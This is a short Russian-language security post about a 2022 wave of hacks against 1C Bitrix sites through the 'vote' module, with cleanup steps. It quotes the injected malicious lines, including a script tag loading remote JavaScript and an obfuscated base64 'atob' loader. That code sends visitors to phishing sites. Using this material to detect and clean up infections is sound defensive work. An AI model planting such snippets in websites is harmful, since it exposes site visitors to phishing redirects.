2 подписчика
Массовый взлом CMS 1С Bitrix (ошибка 500 на сайте). В настоящий момент наблюдается всплеск взломов CMS 1С Bitrix. Злоумышленники используют уязвимость в модуле «vote» CMS Bitrix до версии 22.0.400, которая позволяет записать произвольные файлы в уязвимую систему посредством отправки специально сформированных пакетов. В настоящий момент вредоносная вставка была добавлена злоумышленником с ошибкой, в строке кода был добавлен знак переноса "\n", что вызывает критическую ошибку на сайте (ошибка 500).
Как должен был работать данный сценарий:
Злоумышленник загружает на веб-сайт модифицированный
файл (/bitrix/modules/main/include/prolog.php), в который добавляется строка -\n<script src="https://storejscdn.pw/jqueryui.js"></script>;(домен может изменяться). Эта строка кода вызывает удаленный скрипт jquery-ui.js.
В коде jquery-ui.js , написано условие, что, если переход пользователя на зараженный сайт осуществлен из
поисковой системы в первые за сутки, то открывается URL-адрес
otrasoper[.]ga/help/?23211651614614, который осуществляет переадресацию пользователей
российского сегмента сети Интернет на фишинговые сайты различных маркетплейсов.
Как исправить ?
Нужно, отредактировать файл /bitrix/modules/main/include/prolog.php удалив из него строку \n<script src="https://storejscdn.pw/jqueryui.js"></script>; (домен может изменяться)
Также нужно проверить наличие в файлах:
bitrix/js/main/core/core.js
bitrix/templates/cm_main/js/jquery-1.10.2.min.js
Подобной строки:
s=document.createElement(`script`);s.src=atob(`aHR0cHM6Ly90ZWNobWVzdG9yZS5wdy9qcXVlcnktdWkuanM=`);document.head.appendChild(s);
Ее также следует удалить.
В целях избежания повторения ситуации рекомендуем отключить или удалить модуль «vote».
1 минута
17 октября 2022